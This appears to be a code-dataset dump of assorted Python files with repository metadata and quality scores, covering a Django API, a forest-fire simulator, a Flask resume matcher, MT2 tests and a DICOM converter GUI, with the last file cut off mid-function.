max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content | score | int_score
---|---|---|---|---|---|---|
tangotest/__main__.py | tsoenen/tng-sdk-test | 0 | 12797951 | import argparse
from tangotest.tangotools import create_vnv_test
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Prepare tests for uploading to the V&V platform.')
parser.add_argument('tests_path', help='The path to the directory with test files')
parser.add_argument('ns_package_path', help='The path to the network service package')
parser.add_argument('-t', '--test_package_path', help='The path to generated output folder')
parser.add_argument('-p', '--probe_name', help='Probe name')
args = parser.parse_args()
create_vnv_test(**vars(args))
| 2.359375 | 2 |
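A minimal usage sketch for the CLI above, invoking the same helper programmatically (the keyword names mirror the argparse destinations; the paths and probe name are placeholders, not from the source):

from tangotest.tangotools import create_vnv_test

# Equivalent to: python -m tangotest ./tests ./ns.tgz -t ./out -p my-probe
create_vnv_test(tests_path='./tests',
                ns_package_path='./ns.tgz',
                test_package_path='./out',
                probe_name='my-probe')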
api/states/apiviews.py | Mastersam07/ncovid-19-api | 17 | 12797952 |
from rest_framework import generics, viewsets
from rest_framework.generics import get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Data
from .serializers import StateSerializer # CaseSerializer
class StateList(APIView):
@staticmethod
def get(request):
states = Data.objects.all()
data = StateSerializer(states, many=True).data
return Response(data)
class StateDetail(APIView):
@staticmethod
def get(request, id):
state = get_object_or_404(Data, pk=id)
data = StateSerializer(state).data
return Response(data)
class StateViewSet(viewsets.ModelViewSet):
queryset = Data.objects.all()
serializer_class = StateSerializer
| 2.09375 | 2 |
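StateViewSet above only takes effect once it is routed; a typical hookup uses DRF's DefaultRouter. A sketch, assuming a urls.py next to apiviews.py (the 'states' prefix and basename are illustrative):

# urls.py (sketch)
from rest_framework.routers import DefaultRouter
from .apiviews import StateViewSet

router = DefaultRouter()
router.register(r'states', StateViewSet, basename='state')
urlpatterns = router.urls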
python_parikshith21/Day46.py | 01coders/50-Days-Of-Code | 0 | 12797953 |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 25 14:33:03 2019
@author: Parikshith.H
"""
import numpy as np
arr = np.array([[1, 5, 6],
[4, 7, 2],
[3, 1, 9]])
# maximum element of array
print ("Largest element is:", arr.max())
print ("Row-wise maximum elements:",
arr.max(axis = 1))
# minimum element of array
print ("Column-wise minimum elements:",
arr.min(axis = 0))
# =============================================================================
# #ouptut:
# Largest element is: 9
# Row-wise maximum elements: [6 7 9]
# Column-wise minimum elements: [1 1 2]
# =============================================================================
| 4 | 4 |
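A related one-liner the script above does not show: recovering the (row, column) position of the overall maximum rather than its value. argmax() returns a flat index, and unravel_index maps it back to 2-D coordinates:

import numpy as np

arr = np.array([[1, 5, 6], [4, 7, 2], [3, 1, 9]])
print(np.unravel_index(arr.argmax(), arr.shape))  # (2, 2)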
simulators/fires/UrbanForest.py | rptamin/ddrl-firefighting | 7 | 12797954 |
from collections import defaultdict
import itertools
import numpy as np
from simulators.fires.ForestElements import Tree, SimpleUrban
from simulators.Simulator import Simulator
class UrbanForest(Simulator):
"""
A simulator for a lattice-based forest with urban elements. Based on the LatticeForest simulator.
"""
def __init__(self, dimension, urban_width, rng=None, initial_fire=None,
alpha=None, beta=None, tree_model='exponential'):
# LatticeForest.__init__(self, dimension, rng=rng, initial_fire=initial_fire,
# alpha=alpha, beta=beta, tree_model=tree_model)
Simulator.__init__(self)
self.dims = (dimension, dimension) if isinstance(dimension, int) else dimension
if tree_model == 'exponential':
self.alpha = defaultdict(lambda: 0.2763) if alpha is None else alpha
elif tree_model == 'linear':
self.alpha = defaultdict(lambda: 0.2) if alpha is None else alpha
self.beta = defaultdict(lambda: np.exp(-1/10)) if beta is None else beta
self.rng = rng
self.random_state = np.random.RandomState(self.rng)
self.urban = []
self.urban_width = urban_width
# the forest is a group of Trees and SimpleUrban elements
self.group = dict()
for r in range(self.dims[0]):
for c in range(self.dims[1]):
# urban elements compose the right-most edge of the lattice
if c >= self.dims[1]-self.urban_width:
self.group[(r, c)] = SimpleUrban(self.alpha[(r, c)], self.beta[(r, c)], position=np.array([r, c]),
numeric_id=r*self.dims[1]+c)
self.urban.append((r, c))
# all other elements are trees
else:
self.group[(r, c)] = Tree(self.alpha[(r, c)], self.beta[(r, c)], position=np.array([r, c]),
numeric_id=r*self.dims[1]+c, model=tree_model)
if 0 <= r+1 < self.dims[0]:
self.group[(r, c)].neighbors.append((r+1, c))
if 0 <= r-1 < self.dims[0]:
self.group[(r, c)].neighbors.append((r-1, c))
if 0 <= c+1 < self.dims[1]:
self.group[(r, c)].neighbors.append((r, c+1))
if 0 <= c-1 < self.dims[1]:
self.group[(r, c)].neighbors.append((r, c-1))
self.stats_trees = np.zeros(3).astype(int)
self.stats_trees[0] += self.dims[0]*self.dims[1] - len(self.urban)
self.stats_urban = np.zeros(4).astype(int)
self.stats_urban[0] += len(self.urban)
# start initial fire
self.iter = 0
self.fires = []
self.initial_fire = initial_fire
self._start_fire()
self.early_end = False
self.end = False
return
def _start_fire(self):
"""
Helper method to specify initial fire locations in the forest.
"""
# apply initial condition if specified
if self.initial_fire is not None:
self.fires = self.initial_fire
for p in self.initial_fire:
self.group[p].set_on_fire()
if isinstance(self.group[p], Tree):
self.stats_trees[0] -= 1
self.stats_trees[1] += 1
elif isinstance(self.group[p], SimpleUrban):
self.stats_urban[0] -= 1
self.stats_urban[1] += 1
return
# start a 4x4 square of fires at center
# if forest size is too small, start a single fire at the center
r_center = np.floor((self.dims[0]-1)/2).astype(np.uint8)
c_center = np.floor((self.dims[1]-1)/2).astype(np.uint8)
delta_r = [0] if self.dims[0]<4 else [k for k in range(-1, 3)]
delta_c = [0] if self.dims[1]<4 else [k for k in range(-1, 3)]
deltas = itertools.product(delta_r, delta_c)
for (dr, dc) in deltas:
r, c = r_center+dr, c_center+dc
self.fires.append((r, c))
self.group[(r, c)].set_on_fire()
if isinstance(self.group[(r, c)], Tree):
self.stats_trees[0] -= 1
self.stats_trees[1] += 1
elif isinstance(self.group[(r, c)], SimpleUrban):
self.stats_urban[0] -= 1
self.stats_urban[1] += 1
return
def reset(self):
"""
Reset the simulation object to its initial configuration.
"""
# reset statistics
self.stats_trees = np.zeros(3).astype(int)
self.stats_trees[0] += self.dims[0]*self.dims[1] - len(self.urban)
self.stats_urban = np.zeros(4).astype(int)
self.stats_urban[0] += len(self.urban)
# reset elements
for element in self.group.values():
element.reset()
# reset to initial condition
self.iter = 0
self.fires = []
self._start_fire()
self.random_state = np.random.RandomState(self.rng)
self.end = False
self.early_end = False
return
def dense_state(self):
"""
Creates a representation of the state of each Tree.
:return: 2D numpy array where each position (row, col) corresponds to a Tree state
"""
return np.array([[self.group[(r, c)].state for c in range(self.dims[1])]
for r in range(self.dims[0])])
def update(self, control=None):
"""
Update the simulator one time step.
:param control: collection to map (row, col) to control for each Element,
which is a tuple of (delta_alpha, delta_beta)
"""
if self.end:
print("fire extinguished")
return
if control is None:
control = defaultdict(lambda: (0, 0))
# assume that the fire cannot spread further this step,
# which occurs when no healthy Trees have a neighbor that is on fire
self.early_end = True
# list of (row, col) positions corresponding to elements caught on fire this time step
add = []
# list of (row, col) positions corresponding to healthy elements that have been sampled to determine
# if they will catch on fire
checked = []
# calculate next state for urban elements not on fire, in case they are removed from the lattice
do_not_check = []
for u in self.urban:
if self.group[u].is_healthy(self.group[u].state):
self.group[u].next(self.group, control[u], self.random_state)
if self.group[u].is_removed(self.group[u].next_state):
self.stats_urban[0] -= 1
self.stats_urban[3] += 1
do_not_check.append(u)
# fire spreading check:
# iterate over current fires, find their neighbors that are healthy, and sample
# to determine if the healthy element catches on fire
for f in self.fires:
for fn in self.group[f].neighbors:
if fn not in checked and self.group[fn].is_healthy(self.group[fn].state):
if isinstance(self.group[fn], SimpleUrban) and fn in do_not_check:
continue
self.early_end = False
# calculate next state
self.group[fn].next(self.group, control[fn], self.random_state)
if self.group[fn].is_on_fire(self.group[fn].next_state):
add.append(fn)
checked.append(fn)
# determine if the current element on fire will extinguish this time step
self.group[f].next(self.group, control[f], self.random_state)
if self.group[f].is_burnt(self.group[f].next_state):
if isinstance(self.group[f], Tree):
self.stats_trees[1] -= 1
self.stats_trees[2] += 1
elif isinstance(self.group[f], SimpleUrban):
self.stats_urban[1] -= 1
self.stats_urban[2] += 1
# apply next state to all elements
for element in self.group.values():
element.update()
# retain elements that are still on fire
self.fires = [f for f in self.fires if self.group[f].is_on_fire(self.group[f].state)]
# add elements that caught on fire
self.fires.extend(add)
for a in add:
if isinstance(self.group[a], Tree):
self.stats_trees[0] -= 1
self.stats_trees[1] += 1
elif isinstance(self.group[a], SimpleUrban):
self.stats_urban[0] -= 1
self.stats_urban[1] += 1
self.iter += 1
if not self.fires:
self.early_end = True
self.end = True
return
return
| 2.8125 | 3 |
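A minimal driver sketch for the simulator above (the dimension, urban width, and seed are arbitrary; the import path follows the repository layout implied by the file's own imports):

from simulators.fires.UrbanForest import UrbanForest

sim = UrbanForest(dimension=10, urban_width=2, rng=42)
while not (sim.end or sim.early_end):
    sim.update()              # no control input: defaults to (0, 0) per element
print(sim.iter, 'steps simulated')
print(sim.dense_state())      # 2D array of element states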
scrabbler/__init__.py | astralcai/scrabble-solver | 3 | 12797955 |
from scrabbler.scrabbler import Game
| 0.953125 | 1 |
bin/ColorBoard.py | hfally/mysql-autorestore | 0 | 12797956 | colors = {
'HEADER' : '\033[95m',
'OKBLUE' : '\033[94m',
'OKGREEN' : '\033[0;32m',
'YELLOW' : '\033[0;33m',
'FAIL' : '\033[31m',
'ENDC' : '\033[0m',
'BOLD' : '\033[1m',
'UNDERLINE' : '\033[4m',
'BGRED' : '\033[41;37m'
}
# Handle coloration
def colorize(string, color):
return colors[color.upper()] + string + colors['ENDC']
| 3.03125 | 3 |
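Example use of colorize (color names are keys of the colors dict above, matched case-insensitively; the messages are placeholders):

print(colorize('Restore completed', 'okgreen'))
print(colorize('Restore failed', 'bgred'))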
code-lab/blender/active_object_bbox_loc_rot_dimension.py | kant/AI-Resources | 0 | 12797957 |
"""Get the location, rotation(radian) and dimension of selected object bounding box.
References
- https://blender.stackexchange.com/questions/14070/create-and-export-bounding-boxes-for-objects
"""
import bpy
selected = bpy.context.selected_objects
for obj in selected:
#ensure origin is centered on bounding box center
bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY', center='BOUNDS')
#create a cube for the bounding box
bpy.ops.mesh.primitive_cube_add()
#our new cube is now the active object, so we can keep track of it in a variable:
bound_box = bpy.context.active_object
bpy.context.active_object.display_type = 'WIRE'
#copy transforms
bound_box.dimensions = obj.dimensions
bound_box.location = obj.location
bound_box.rotation_euler = obj.rotation_euler
print(obj.dimensions)
print(obj.location)
print(obj.rotation_euler)
| 2.890625 | 3 |
example/docs/conf.py | zenitysec/sphinx-rego | 13 | 12797958 | project = 'sphinx-rego example'
copyright = '2021, sphinx-rego'
author = 'sphinx-rego'
release = '1'
extensions = ["sphinxrego.ext"]
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
html_theme = 'alabaster'
| 0.9375 | 1 |
python-libs/histogram.py | bilbopingouin/simple-stats-tools | 0 | 12797959 | # This create an array to plot an histogram as
# ^
# | +-+
# | +-+ | +-+
# | | | +-+ |
# | +-+ | | | +-+
# | | | | | | | +-+
# +---+-+-+-+-+-+-+-+------->
#    Vmin            Vmax
class histogram:
def __init__(self, vmin, vmax, nbins):
self.init_values(vmin, vmax, nbins)
def init_values(self, vmin, vmax, nbins):
self.array = [0] * nbins
self.min = vmin
self.max = vmax
self.step = float(vmax-vmin)/float(nbins)
def add_value(self, v):
if v > self.min and v < self.max:
bin_idx = int((v - self.min) // self.step)
self.array[bin_idx] += 1
def print_array(self):
print(self.array)
def print(self):
for i in range(len(self.array)):
print(i*self.step+0.5*self.step+self.min, self.array[i])
| 3.84375 | 4 |
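A short usage sketch for the class above; the Gaussian sample source is an arbitrary choice for illustration (values outside (vmin, vmax) are silently dropped by add_value):

import random

h = histogram(0.0, 10.0, nbins=20)
for _ in range(1000):
    h.add_value(random.gauss(5.0, 2.0))
h.print()  # one "bin_center count" pair per line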
app.py | manojvirat457/Resume-Matching | 0 | 12797960 | # from scripts import tabledef
# from scripts import forms
# from scripts import helpers
from flask import Flask, redirect, url_for, render_template, request, session
import json
import sys
import os
# import stripe
import pandas as pd
from werkzeug.utils import secure_filename
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import CountVectorizer
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import jieba
import jieba.analyse
import csv
import ast
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import XMLConverter, HTMLConverter, TextConverter
from pdfminer.layout import LAParams
import io
app = Flask(__name__)
# app.secret_key = os.urandom(12) # Generic key for dev purposes only
# stripe_keys = {
# 'secret_key': os.environ['secret_key'],
# 'publishable_key': os.environ['publishable_key']
# }
# stripe.api_key = stripe_keys['secret_key']
# Heroku
#from flask_heroku import Heroku
#heroku = Heroku(app)
# ======== Routing =========================================================== #
# -------- Login ------------------------------------------------------------- #
@app.route('/', methods=['GET', 'POST'])
def login():
# creating a pdf file object
basepath = os.path.dirname(__file__)
file_path = os.path.join(basepath, 'uploads', 'sample.pdf')
fp = open(file_path, 'rb')
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, laparams=laparams)
# Create a PDF interpreter object.
interpreter = PDFPageInterpreter(rsrcmgr, device)
# Process each page contained in the document.
for page in PDFPage.get_pages(fp):
interpreter.process_page(page)
data = retstr.getvalue()
print(data)
return render_template('home.html', user="manoj")
# return text
def getFile():
    root = Tk()
    root.withdraw()
    filename = askopenfilename()
    root.destroy()
    return filename
@app.route("/logout")
def logout():
session['logged_in'] = False
return redirect(url_for('login'))
@app.route('/predict', methods=['GET', 'POST'])
def upload():
if request.method == 'GET':
# f = request.files['file']
basepath = os.path.dirname(__file__)
# file_path = os.path.join(
# basepath, 'uploads', secure_filename(f.filename))
# f.save(file_path)
file_path = os.path.join(basepath, 'uploads', 'test-upload.csv')
df = pd.read_csv(file_path)
seg_list01 = df['job-description']
seg_list02 = df['your-resume']
item01_list = seg_list01
item01 = ','.join(item01_list)
item02_list = seg_list02
item02 = ','.join(item02_list)
documents = [item01, item02]
count_vectorizer = CountVectorizer()
sparse_matrix = count_vectorizer.fit_transform(documents)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=['item01', 'item02'])
df.to_csv(os.path.join(basepath, 'uploads', 'result.csv'))
read_file = pd.read_csv(os.path.join(basepath, 'uploads',
'result.csv'))
read_file.to_excel(os.path.join(basepath, 'uploads', 'result.xlsx'),
index=None,
header=True)
answer = cosine_similarity(df, df)
print("CSV Created Successfully")
answer = pd.DataFrame(answer)
answer = answer.iloc[[1], [0]].values[0]
answer = round(float(answer), 4) * 100
return "Your resume matched " + str(
answer) + " %" + " of the job-description!"
return None
# ======== Main ============================================================== #
if __name__ == "__main__":
app.run(debug=True, use_reloader=True)
| 1.875 | 2 |
strategist/tests/factories.py | OpenMatchmaking/microservice-strategist | 0 | 12797961 | from uuid import uuid4
def generate_player_data(event_name, rating):
return {
"id": str(uuid4()),
"response-queue": "{}-response-queue".format(str(uuid4())),
"event-name": event_name,
"detail": {
"rating": rating,
"content": {}
}
}
| 2.625 | 3 |
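A usage sketch for the factory above (the event name and rating are arbitrary test values):

player = generate_player_data('player.search', rating=1500)
assert player['event-name'] == 'player.search'
assert player['detail']['rating'] == 1500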
tests/test_mt2_tombs.py | tpgillam/mt2 | 3 | 12797962 | """Tests for the variant of MT2 by <NAME>."""
import numpy
import pytest
from .common import mt2_lester, mt2_tombs
def test_simple_example():
computed_val = mt2_tombs(100, 410, 20, 150, -210, -300, -200, 280, 100, 100)
assert computed_val == pytest.approx(412.628)
def test_near_massless():
# This test is based on Fig 5 of https://arxiv.org/pdf/1411.4312.pdf
m_vis_a = 0
px_a = -42.017340486
py_a = -146.365340528
m_vis_b = 0.087252259
px_b = -9.625614206
py_b = 145.757295514
px_miss = -16.692279406
py_miss = -14.730240471
chi_a = 0
chi_b = 0
computed_val = mt2_tombs(
m_vis_a, px_a, py_a, m_vis_b, px_b, py_b, px_miss, py_miss, chi_a, chi_b
)
assert computed_val == pytest.approx(0.09719971)
def test_fuzz():
batch_size = 100
num_tests = 1000
numpy.random.seed(42)
def _random_batch(min_, max_):
return numpy.random.uniform(min_, max_, (batch_size,))
for _ in range(num_tests):
m_vis_1 = _random_batch(0, 100)
px_vis_1 = _random_batch(-100, 100)
py_vis_1 = _random_batch(-100, 100)
m_vis_2 = _random_batch(0, 100)
px_vis_2 = _random_batch(-100, 100)
py_vis_2 = _random_batch(-100, 100)
px_miss = _random_batch(-100, 100)
py_miss = _random_batch(-100, 100)
m_invis_1 = _random_batch(0, 100)
m_invis_2 = _random_batch(0, 100)
args = (
m_vis_1,
px_vis_1,
py_vis_1,
m_vis_2,
px_vis_2,
py_vis_2,
px_miss,
py_miss,
m_invis_1,
m_invis_2,
)
result_lester = mt2_lester(*args)
result_tombs = mt2_tombs(*args)
numpy.testing.assert_allclose(result_lester, result_tombs, rtol=1e-12)
def test_scale_invariance():
example_args = numpy.array((100, 410, 20, 150, -210, -300, -200, 280, 100, 100))
example_val = mt2_tombs(*example_args)
# mt2 scales with its arguments; check over some orders of magnitude.
for i in range(-100, 100, 10):
scale = 10.0 ** i
with numpy.errstate(over="ignore"):
# Suppress overflow warnings when performing the evaluation; we're happy
# so long as we match approximately in the test below.
computed_val = mt2_tombs(*(example_args * scale))
assert computed_val == pytest.approx(example_val * scale)
def test_negative_masses():
# Any negative mass is unphysical.
# These arguments use negative masses to make both initial bounds negative.
# Check that the result is neither positive nor an infinite loop.
computed_val = mt2_tombs(1, 2, 3, 4, 5, 6, 7, 8, -90, -100)
assert not (computed_val > 0)
| 2.515625 | 3 |
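These tests reach both backends through the local .common shim; callers would normally use the released package directly. A sketch, assuming the public API exposes a ten-argument mt2 function in the same argument order used above:

from mt2 import mt2  # assumed public entry point

# Same event as test_simple_example; expect roughly 412.628
print(mt2(100, 410, 20, 150, -210, -300, -200, 280, 100, 100))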
ex092.py | raphael-abrantes/exercises-python | 0 | 12797963 | from datetime import datetime
pessoa = dict()
anohoje = datetime.now().year
pessoa['nome'] = str(input('Enter the name: ')).strip().title()
nasc = int(input('Enter the year of birth: '))
pessoa['idade'] = anohoje - nasc
pessoa['ctps'] = int(input('Enter the CTPS number (0 if none): '))
if pessoa['ctps'] != 0:
    pessoa['contratacao'] = int(input('Enter the year of hiring: '))
    pessoa['salario'] = float(input('Enter the salary: '))
    faltam = 35 - (anohoje - pessoa['contratacao'])
    pessoa['aposentar'] = pessoa['idade'] + faltam
print('-='*15)
for k, v in pessoa.items():
    print(f' - {k} has the value {v}')
| 3.671875 | 4 |
multithread/mtfacfib.py | hero0926/PythonPlayground | 0 | 12797964 | # Compare single-threaded and multi-threaded execution
from myThread import MyThread
from time import ctime, sleep
# Run Fibonacci, factorial, and summation first in a single thread, then in multiple threads.
def fib(x):
    sleep(0.005)
    if x < 2: return 1
    return (fib(x-2) + fib(x-1))
def fac(x):
    sleep(0.1)
    if x < 2: return 1
    return (x * fac(x-1))
def sum(x):
    sleep(0.1)
    if x < 2: return 1
    return (x + sum(x-1))
funcs = (fib, fac, sum)
n = 12
def main():
    nfuncs = range(len(funcs))
    print 'single thread'
    for i in nfuncs:
        print 'starting', funcs[i].__name__, 'at:', ctime()
        print funcs[i](n)
        print funcs[i].__name__, 'finished at:', ctime()
    print 'multiple threads'
    threads = []
    for i in nfuncs:
        t = MyThread(funcs[i], (n,), funcs[i].__name__)
        threads.append(t)
    for i in nfuncs:
        threads[i].start()
    for i in nfuncs:
        threads[i].join()
        print threads[i].getResult()
    print 'all DONE'
if __name__ == '__main__':
    main()
| 3.84375 | 4 |
pyDcmConverter/dicomgui.py | ChenglongWang/pythonDicomConverter | 4 | 12797965 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# dicomgui.py
"""Main app file that convert DICOM data via a wxPython GUI dialog."""
# Copyright (c) 2018-2020 <NAME>
# Copyright (c) 2009-2017 <NAME>
# Copyright (c) 2009 <NAME>
# This file is part of dicompyler, released under a BSD license.
# See the file license.txt included with this distribution, also
# available at https://github.com/bastula/dicompyler/
#
# It's assumed that the reference (prescription) dose is in cGy.
import hashlib, os, threading, functools, json, warnings
from logging import getLogger, DEBUG, INFO
logger = getLogger('DcmConverter')
import wx
warnings.filterwarnings("ignore", category=wx.wxPyDeprecationWarning)
from wx.xrc import *
import numpy as np
from dicompylercore import dicomparser
from pyDcmConverter import guiutil, util
class DcmConverterApp(wx.App):
"""Prepare to show the dialog that will Import DICOM and DICOM RT files."""
def OnInit(self):
wx.GetApp().SetAppName("DicomConverter")
# Load the XRC file for our gui resources
self.res = XmlResource(util.GetResourcePath('dicomgui.xrc'))
dlgDicomImporter = self.res.LoadDialog(None, "DicomImporterDialog")
dlgDicomImporter.Init(self.res)
# Show the dialog and return the result
ret = dlgDicomImporter.ShowModal()
# Save configure
conf = {}
with open('.dcmconverter.conf', 'w') as f:
conf['path'] = dlgDicomImporter.path
conf['only_export_voldata'] = dlgDicomImporter.only_export_voldata
conf['min_slice_num'] = dlgDicomImporter.min_slice_num
conf['offset'] = dlgDicomImporter.offset
conf['export_mori_format'] = dlgDicomImporter.export_mori_format
conf['export_nii_format'] = dlgDicomImporter.export_nii_format
conf['output_dir'] = dlgDicomImporter.output_dir
conf['output_name'] = dlgDicomImporter.output_name
json.dump(conf, f, indent=2, sort_keys=True)
# Block until the thread is done before destroying the dialog
if dlgDicomImporter:
if hasattr(dlgDicomImporter, 't'):
dlgDicomImporter.t.join()
dlgDicomImporter.Destroy()
os.sys.exit(0)
return 1
class DicomImporterDialog(wx.Dialog):
"""Import DICOM RT files and return a dictionary of data."""
def __init__(self):
wx.Dialog.__init__(self)
def Init(self, res):
"""Method called after the panel has been initialized."""
# Set window icon
if not guiutil.IsMac():
self.SetIcon(guiutil.get_icon())
# Initialize controls
self.txtDicomImport = XRCCTRL(self, 'txtDicomImport')
self.btnDicomImport = XRCCTRL(self, 'btnDicomImport')
self.btnPause = XRCCTRL(self, 'btn_pause')
self.checkSearchSubfolders = XRCCTRL(self, 'checkSearchSubfolders')
self.lblProgressLabel = XRCCTRL(self, 'lblProgressLabel')
self.lblProgress = XRCCTRL(self, 'lblProgress')
self.gaugeProgress = XRCCTRL(self, 'gaugeProgress')
self.lblProgressPercent = XRCCTRL(self, 'lblProgressPercent')
self.lblProgressPercentSym = XRCCTRL(self, 'lblProgressPercentSym')
self.tcPatients = XRCCTRL(self, 'tcPatients')
self.bmpRxDose = XRCCTRL(self, 'bmpRxDose')
self.lblRxDose = XRCCTRL(self, 'lblRxDose')
self.txtRxDose = XRCCTRL(self, 'txtRxDose')
self.lblRxDoseUnits = XRCCTRL(self, 'lblRxDoseUnits')
# Bind interface events to the proper methods
self.Bind(wx.EVT_BUTTON, self.OnBrowseDicomImport, id=XRCID('btnDicomImport'))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckSearchSubfolders, id=XRCID('checkSearchSubfolders'))
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelectTreeItem, id=XRCID('tcPatients'))
#self.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnOK, id=XRCID('tcPatients'))
#added by CL.Wang
self.Bind(wx.EVT_CHECKBOX, self.OnCheckVolFlag, id=XRCID('check_volume'))
self.Bind(wx.EVT_SPINCTRL, self.OnSpinSliceNum, id=XRCID('spin_minslices'))
self.Bind(wx.EVT_SPINCTRL, self.OnSpinOffset, id=XRCID('spin_offset'))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckMoriFormat, id=XRCID('check_mori'))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckNiftiFormat, id=XRCID('check_nifti'))
self.Bind(wx.EVT_DIRPICKER_CHANGED, self.OnPickOutdir, id=XRCID('picker_output'))
self.Bind(wx.EVT_TEXT, self.OnInputName, id=XRCID('text_output_name'))
self.Bind(wx.EVT_BUTTON, self.OnConvert, id=XRCID('btn_convert'))
self.Bind(wx.EVT_BUTTON, self.OnPause, id=XRCID('btn_pause'))
self.Bind(wx.EVT_BUTTON, self.OnRescan, id=XRCID('btn_rescan'))
# Init variables
if os.path.isfile('.dcmconverter.conf'):
logger.info('Loading previous configuration...')
with open('.dcmconverter.conf', 'r') as f:
conf = json.load(f)
self.path = conf['path']
self.txtDicomImport.SetValue(self.path)
self.only_export_voldata = conf['only_export_voldata']
XRCCTRL(self, 'check_mori').SetValue(self.only_export_voldata)
self.min_slice_num = conf['min_slice_num']
XRCCTRL(self, 'spin_minslices').SetValue(self.min_slice_num)
self.offset = conf['offset']
XRCCTRL(self, 'spin_offset').SetValue(self.offset)
self.export_mori_format = conf['export_mori_format']
XRCCTRL(self, 'check_mori').SetValue(self.export_mori_format)
self.export_nii_format = conf['export_nii_format']
XRCCTRL(self, 'check_nifti').SetValue(self.export_nii_format)
self.output_dir = conf['output_dir']
XRCCTRL(self, 'picker_output').SetPath(self.output_dir)
self.output_name = conf['output_name']
XRCCTRL(self, 'text_output_name').SetValue(self.output_name)
else:
self.path = os.path.expanduser('~')
self.only_export_voldata = XRCCTRL(self, 'check_volume').IsChecked()
self.min_slice_num = int(XRCCTRL(self, 'spin_minslices').GetValue())
self.offset = int(XRCCTRL(self, 'spin_offset').GetValue())
self.export_mori_format = XRCCTRL(self, 'check_mori').IsChecked()
self.export_nii_format = XRCCTRL(self, 'check_nifti').IsChecked()
self.output_dir = ''
self.output_name = ''
# Set the dialog font and bold the font of the directions label
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
if guiutil.IsMac():
self.txtDicomImport.SetFont(font)
self.btnDicomImport.SetFont(font)
self.checkSearchSubfolders.SetFont(font)
self.lblProgressLabel.SetFont(font)
self.lblProgress.SetFont(font)
self.lblProgressPercent.SetFont(font)
self.lblProgressPercentSym.SetFont(font)
self.tcPatients.SetFont(font)
self.txtRxDose.SetFont(font)
self.lblRxDoseUnits.SetFont(font)
font.SetWeight(wx.FONTWEIGHT_BOLD)
self.lblRxDose.SetFont(font)
# Initialize the patients tree control
self.root = self.InitTree()
# Initialize the patients dictionary
self.patients = {}
# Search subfolders by default
self.import_search_subfolders = True
# Set the threading termination status to false intially
self.terminate = False
# Hide the progress bar until it needs to be shown
self.gaugeProgress.Show(False)
self.lblProgressPercent.Show(False)
self.lblProgressPercentSym.Show(False)
# Start the directory search as soon as the panel loads
#self.OnDirectorySearch()
def OnRescan(self, evt):
self.OnDirectorySearch()
def OnPause(self, evt):
self.terminate = True
def OnSpinOffset(self, evt):
self.offset = evt.GetPosition()
def OnCheckVolFlag(self, evt):
self.only_export_voldata = evt.IsChecked()
try:
self.Check_Export_Files()
except:
logger.info('Adjusted parameters before the tree was generated.')
def OnSpinSliceNum(self, evt):
self.min_slice_num = evt.GetPosition()
try:
self.Check_Export_Files()
except:
logger.info('Adjusted parameters before the tree was generated.')
def OnCheckMoriFormat(self, evt):
self.export_mori_format = evt.IsChecked()
def OnCheckNiftiFormat(self, evt):
self.export_nii_format = evt.IsChecked()
def OnPickOutdir(self, evt):
self.output_dir = evt.GetPath()
def OnInputName(self, evt):
self.output_name = evt.GetString()
def AlertDialog(self, msg):
dialog = wx.MessageDialog(self, msg, 'Error', style=wx.OK)
dialog.ShowModal()
dialog.Destroy()
def ChoiceDialog(self, msg):
dialog = wx.MessageDialog(self, msg, 'Warning', style=wx.OK_DEFAULT|wx.CANCEL)
self.contiune_export = dialog.ShowModal()
dialog.Destroy()
def __GetNiftiAffineMatrix__(self, dp):
di = float(dp.ds.PixelSpacing[0])
dj = float(dp.ds.PixelSpacing[1])
orientation = dp.ds.ImageOrientationPatient
dk = float(dp.ds.SliceThickness)
m = np.array(
[[float(orientation[0])*di, float(orientation[3])*dj, 0, 0],
[float(orientation[1])*di, float(orientation[4])*dj, 0, 0],
[float(orientation[2])*di, float(orientation[5])*dj, dk, 0],
[0, 0, 0, 1]], dtype=float)
return m
def ExportFunc(self, out_basepath, patient_data, progressFunc=None):
if patient_data is None:
return
# Existence check
if self.export_mori_format:
out_dir = os.path.join(os.path.dirname(out_basepath), 'LabFormat')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
mori_fname = os.path.join(out_dir, os.path.basename(out_basepath))
if os.path.isfile(mori_fname+'.raw.gz'):
self.ChoiceDialog('File existed! Continue?')
if self.contiune_export != wx.ID_OK:
return
if self.export_nii_format:
out_dir = os.path.join(os.path.dirname(out_basepath), 'NiftiFormat')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
nii_fname = os.path.join(out_dir, os.path.basename(out_basepath)+'.nii.gz')
if os.path.isfile(nii_fname):
self.ChoiceDialog('File existed! Continue?')
if self.contiune_export != wx.ID_OK:
return
dp = dicomparser.DicomParser(patient_data['images'][0])
reso = [ float(dp.ds.PixelSpacing[0]), float(dp.ds.PixelSpacing[1]), float(dp.ds.SliceThickness)]
affine = self.__GetNiftiAffineMatrix__(dp)
conv_kernel, hospital, kvp, model_name = dp.ds.ConvolutionKernel, dp.ds.InstitutionName, dp.ds.KVP, dp.ds.ManufacturerModelName
img_ori, pat_ori, pat_pos = np.array(dp.ds.ImageOrientationPatient), dp.ds.PatientOrientation, dp.ds.PatientPosition
study_date, serise_date, acq_date = dp.ds.StudyDate, dp.ds.SeriesDate, dp.ds.AcquisitionDate
